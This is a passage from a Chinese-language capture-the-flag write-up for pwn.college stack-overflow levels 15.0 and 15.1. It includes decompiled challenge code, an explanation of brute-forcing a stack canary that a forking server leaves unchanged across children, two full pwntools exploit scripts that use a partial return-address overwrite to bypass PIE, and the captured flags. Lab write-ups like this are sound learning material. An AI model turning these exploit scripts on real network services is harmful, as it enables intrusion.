  *(_WORD *)addr.sa_data = htons(0x539u);
  bind(fd, &addr, 0x10u);
  listen(fd, 1);
  while ( 1 )
  {
    v7 = accept(fd, 0LL, 0LL);
    if ( !fork() )
      break;
    close(v7);
    wait(0LL);
  }
  dup2(v7, 0);
  dup2(v7, 1);
  dup2(v7, 2);
  close(fd);
  close(v7);
  challenge((unsigned int)argc, argv, envp);
  puts("### Goodbye!");
  return 0;
}

观察这个 main 函数我们可知，它所做的大致就是持续监听 1337 端口，连上了就创建一个子进程执行 challenge。

__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
{
  int *v3; // rax
  char *v4; // rax
  _QWORD v6[3]; // [rsp+0h] [rbp-C0h] BYREF
  int v7; // [rsp+1Ch] [rbp-A4h]
  int v8; // [rsp+2Ch] [rbp-94h]
  size_t nbytes; // [rsp+30h] [rbp-90h] BYREF
  void *buf; // [rsp+38h] [rbp-88h]
  _QWORD v11[13]; // [rsp+40h] [rbp-80h] BYREF
  __int16 v12; // [rsp+A8h] [rbp-18h]
  unsigned __int64 v13; // [rsp+B8h] [rbp-8h]
  __int64 savedregs; // [rsp+C0h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+C8h] [rbp+8h] BYREF

  v7 = a1;
  v6[2] = a2;
  v6[1] = a3;
  v13 = __readfsqword(0x28u);
  memset(v11, 0, sizeof(v11));
  v12 = 0;
  buf = v11;
  nbytes = 0LL;
  puts("The challenge() function has just been launched!");
  sp_ = (__int64)v6;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
  DUMP_STACK(sp_, sz_);
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
  puts("including the saved base pointer and the saved return address, for a");
  printf("total of %d bytes.\n", 8 * sz_);
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
  puts("(\"above\" it in the stack are other local variables used by the function).");
  puts("Your input will be read into this buffer.");
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 106);
  puts("large input length, and thus overflow the buffer.\n");
  puts("In this level, there is no \"win\" variable.");
  puts("You will need to force the program to execute the win_authed() function");
  puts("by directly overflowing into the stored return address back to main,");
  printf(
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
    (const void *)rp_,
    rp_ - (_DWORD)buf);
  printf(
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
    rp_ - (_DWORD)buf + 8,
    106);
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)buf - 106);
  puts("and 8 that will overwrite the return address).\n");
  cp_ = bp_;
  cv_ = __readfsqword(0x28u);
  while ( *(_QWORD *)cp_ != cv_ )
    cp_ -= 8LL;
  puts("While canaries are enabled, this networked program forks.");
  puts("What is important to note is that the canary does not get re-randomized on fork.\n");
  puts("When data that you are overflowing into is critical (i.e., if you screw it up");
  puts("the program crashes), but also static across executions, you can brute-force");
  puts("it byte by byte over many attempts.\n");
  puts("So, let's brute-force the canary!");
  puts("If this is your first time running this program, all you know so far is that");
  puts("the canary has a 0 as its left-most byte.");
  puts("You should proceed like this:\n");
  puts("- First, you should try overflowing just the null byte of the canary, for");
  printf("  practice. The canary starts at %p, which is %d bytes after the\n", (const void *)cp_, cp_ - (_DWORD)buf);
  printf("  start of your buffer. Thus, you should provide %d characters followed\n", cp_ - (_DWORD)buf);
  puts("  by a NULL byte, make sure the canary check passes, then try a non-NULL");
  puts("  byte and make sure the canary check fails. This will confirm the offsets.");
  puts("- Next try each possible value for just the next byte. One of them (the same");
  puts("  as whatever was there in memory already) will keep the canary intact, and");
  puts("  when the canary check succeeds, you know you have found the correct one.");
  puts("- Go on to the next byte, leak it the same way, and so on, until you have");
  puts("  the whole canary.\n");
  puts("You will likely want to script this process! Each byte might take up to 256");
  puts("tries to guess..\n");
  puts("Because the binary is position independent, you cannot know");
  puts("exactly where the win_authed() function is located.");
  puts("This means that it is not clear what should be written into the return address.\n");
  printf("Payload size: ");
  __isoc99_scanf("%lu", &nbytes);
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
  printf(
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
    (char *)buf + nbytes,
    nbytes - 106);
  printf("Of these, you will overwrite %d bytes into the return address.\n", nbytes + (_DWORD)buf - rp_);
  puts("If that number is greater than 8, you will overwrite the entire return address.\n");
  puts("Overwriting the entire return address is fine when we know");
  puts("the whole address, but here, we only really know the last three nibbles.");
  puts("These nibbles never change, because pages are aligned to 0x1000.");
  puts("This gives us a workaround: we can overwrite the least significant byte");
  puts("of the saved return address, which we can know from debugging the binary,");
  puts("to retarget the return to main to any instruction that shares the other 7 bytes.");
  puts("Since that last byte will be constant between executions (due to page alignment),");
  puts("this will always work.");
  puts("If the address we want to redirect execution to is a bit farther away from");
  puts("the saved return address, and we need to write two bytes, then one of those");
  puts("nibbles (the fourth least-significant one) will be a guess, and it will be");
  puts("incorrect 15 of 16 times.");
  puts("This is okay: we can just run our exploit a few times until it works");
  puts("(statistically, ~50% chance after 11 times and ~90% chance after 36 times).");
  puts("One caveat in this challenge is that the win_authed() function must first auth:");
  puts("it only lets you win if you provide it with the argument 0x1337.");
  puts("Speifically, the win_authed() function looks something like:");
  puts("    void win_authed(int token)");
  puts("    {");
  puts("      if (token != 0x1337) return;");
  puts("      puts(\"You win! Here is your flag: \");");
  puts("      sendfile(1, open(\"/flag\", 0), 0, 256);");
  puts("      puts(\"\");");
  puts("    }");
  puts(byte_43BB);
  puts("So how do you pass the check? There *is* a way, and we will cover it later,");
  puts("but for now, we will simply bypass it! You can overwrite the return address");
  puts("with *any* value (as long as it points to executable code), not just the start");
  puts("of functions. Let's overwrite past the token check in win!\n");
  puts("To do this, we will need to analyze the program with objdump, identify where");
  puts("the check is in the win_authed() function, find the address right after the check,");
  puts("and write that address over the saved return address.\n");
  puts("Go ahead and find this address now. When you're ready, input a buffer overflow");
  printf(
    "that will overwrite the saved return address (at %p, %d bytes into the buffer)\n",
    (const void *)rp_,
    rp_ - (_DWORD)buf);
  puts("with the correct value.\n");
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  v8 = read(0, buf, nbytes);
  if ( v8 < 0 )
  {
    v3 = __errno_location();
    v4 = strerror(*v3);
    printf("ERROR: Failed to read input -- %s!\n", v4);
    exit(1);
  }
  printf("You sent %d bytes!\n", v8);
  puts("Let's see what happened with the stack:\n");
  DUMP_STACK(sp_, sz_);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", buf);
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
  printf("- the canary is stored at %p.\n", (const void *)cp_);
  printf("- the canary value is now %p.\n", *(const void **)cp_);
  printf("- the address of win_authed() is %p.\n", win_authed);
  putchar(10);
  puts("If you have managed to overwrite the return address with the correct value,");
  puts("challenge() will jump straight to win_authed() when it returns.");
  printf("Let's try it now!\n\n");
  if ( (unsigned __int64)buf + v8 > rp_ + 2 )
  {
    puts("WARNING: You sent in too much data, and overwrote more than two bytes of the address.");
    puts("         This can still work, because I told you the correct address to use for");
    puts("         this execution, but you should not rely on that information.");
    puts("         You can solve this challenge by only overwriting two bytes!");
    puts("         ");
  }
  puts("Goodbye!");
  return 0LL;
}

这个 challenge 也没啥好说的，存在一个栈溢出。

因为我们的子进程都是由主进程生成的，所以每个子进程都会持有和主进程相同的 canary 值。利用这点加上栈溢出漏洞，我们可以爆破 canary。这是个 64-bits 程序，我们实际只要爆破 56-bits，所以爆破时间不会很长。

把 canary 爆出来后，就可以去快乐的覆盖返回地址了。因为有 PIE 保护，所以我们还得猜倒数第四个 nibble，不过我相信这对你来说也是一件很轻松的事情～

Exploit

#!/usr/bin/python3

import os
import subprocess
import time

import psutil
from pwn import ELF, context, gdb, log, pause, process, random, remote, sleep

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-15-0"
HOST, PORT = "localhost", 1337

gdbscript = """
set follow-fork-mode child
b *challenge+1807
c
"""


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def get_forked_pid(parent_pid):
    parent = psutil.Process(parent_pid)
    children = parent.children()

    log.success(f"Parent process: {parent_pid} -> Found children: {children}")
    if len(children) != 1:
        raise Exception(f"Expected 1 child process, found {len(children)}")
    return children[0].pid


def launch(local=True, debug=False, aslr=False, argv=None, envp=None, attach=False):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        target = process([elf.path] + (argv or []), env=envp, aslr=aslr)

        if debug:
            if attach:
                with open(os.devnull, "w") as fnull:
                    subprocess.Popen(
                        [context.terminal[0], "-e", "nc", "localhost", "1337"],
                        stderr=fnull,
                    )
                    sleep(3)

                child_pid = get_forked_pid(target.pid)
                gdb.attach(target=child_pid, gdbscript=gdbscript)

                return remote(HOST, PORT)
            else:
                target.close()

                return gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


padding_to_canary = b"".ljust(0x78, b"A")
padding_to_ret = b"".ljust(0x8, b"A")
fixed_offset = b"\x6b"
possible_bytes = [bytes([i]) for i in range(0xD, 0x10D, 0x10)]


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()

        target.sendlineafter(b"Payload size: ", payload_size)
        target.sendafter(b"Send your payload", payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def brute_force_canary():
    canary = b"\x00"
    start_time = time.time()

    log.progress("Brute-forcing the canary...")

    while len(canary) < 0x8:
        for byte in range(0x0, 0xFF):
            with remote(HOST, PORT) as target:
                send_payload(target, padding_to_canary + canary + bytes([byte]))

                response = target.recvall(timeout=5)

                if b"*** stack smashing detected ***" not in response:
                    canary += bytes([byte])
                    break

    end_time = time.time()
    elapsed_time = end_time - start_time

    log.success(
        f"Canary brute-forced: {to_hex_bytes(canary)} in {elapsed_time:.2f} seconds"
    )
    sleep(1)

    return canary


def construct_payload(canary):
    payload = padding_to_canary
    payload += canary
    payload += padding_to_ret
    payload += fixed_offset + random.choice(possible_bytes)

    return payload


def attack(payload):
    try:
        with remote(HOST, PORT) as target:
            send_payload(target, payload)

            response = target.recvall(timeout=5)

            return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    launch()
    canary = brute_force_canary()

    while True:
        try:
            payload = construct_payload(canary)

            if attack(payload):
                log.success("Success! Exiting...")

                pause()
                exit()
        except Exception as e:
            log.exception(f"An error occurred in main loop: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{MiU_dCA8jccj_TYZgFn1iejPdTj.01NxMDL5cTNxgzW}

Level 15.1

Information

Category: Pwn

Description

Defeat a stack canary in a PIE binary by utilizing a network-style fork server in the target binary.

Write-up

不用讲吧，思路见上题。

Exploit

#!/usr/bin/python3

import os
import subprocess
import time

import psutil
from pwn import ELF, context, gdb, log, pause, process, random, remote, sleep

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-15-1"
HOST, PORT = "localhost", 1337

gdbscript = """
set follow-fork-mode child
b *challenge+213
c
"""


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def get_forked_pid(parent_pid):
    parent = psutil.Process(parent_pid)
    children = parent.children()

    log.success(f"Parent process: {parent_pid} -> Found children: {children}")
    if len(children) != 1:
        raise Exception(f"Expected 1 child process, found {len(children)}")
    return children[0].pid


def launch(local=True, debug=False, aslr=False, argv=None, envp=None, attach=False):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        target = process([elf.path] + (argv or []), env=envp, aslr=aslr)

        if debug:
            if attach:
                with open(os.devnull, "w") as fnull:
                    subprocess.Popen(
                        [context.terminal[0], "-e", "nc", "localhost", "1337"],
                        stderr=fnull,
                    )
                    sleep(3)

                child_pid = get_forked_pid(target.pid)
                gdb.attach(target=child_pid, gdbscript=gdbscript)

                return remote(HOST, PORT)
            else:
                target.close()

                return gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


padding_to_canary = b"".ljust(0x48, b"A")
padding_to_ret = b"".ljust(0x8, b"A")
fixed_offset = b"\xcd"
possible_bytes = [bytes([i]) for i in range(0x5, 0x105, 0x10)]


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()

        target.sendlineafter(b"Payload size: ", payload_size)
        target.sendafter(b"Send your payload", payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def brute_force_canary():
    canary = b"\x00"
    start_time = time.time()

    while len(canary) < 0x8:
        for byte in range(0x0, 0xFF):
            with remote(HOST, PORT) as target:
                log.progress("Brute-forcing the canary...")
                send_payload(target, padding_to_canary + canary + bytes([byte]))

                response = target.recvall(timeout=5)

                if b"*** stack smashing detected ***" not in response:
                    canary += bytes([byte])
                    break

    end_time = time.time()
    elapsed_time = end_time - start_time

    log.success(
        f"Canary brute-forced: {to_hex_bytes(canary)} in {elapsed_time:.2f} seconds"
    )
    sleep(1)

    return canary


def construct_payload(canary):
    payload = padding_to_canary
    payload += canary
    payload += padding_to_ret
    payload += fixed_offset + random.choice(possible_bytes)

    return payload


def attack(payload):
    try:
        with remote(HOST, PORT) as target:
            send_payload(target, payload)

            response = target.recvall(timeout=5)

            return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    launch()
    canary = brute_force_canary()

    while True:
        try:
            payload = construct_payload(canary)

            if attack(payload):
                log.success("Success! Exiting...")

                pause()
                exit()
        except Exception as e:
            log.exception(f"An error occurred in main loop: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{8C2ZHb8LE-O7bRe0DvQeo4_5XUV.0FOxMDL5cTNxgzW}

后记

pwn.college 的题目质量没得说，我感觉很棒。打完这 30 题一共花了我 18 天，感觉挺慢的，但算了一下天数好像也没花太久吧哈哈哈。那么，下一站，Shellcode Injection！

马上就放寒假了，不知道我能在下次开学前达到什么水平呢 >w<

让我们拭目以待。

~唉，寒假还得准备英语等级考试，爷的时间啊！:sob:~

~话说，如果你不写后记，你一定不知道写后记有多爽 bushi~

~Alr, right now, let's sleep!~ Let's liberate~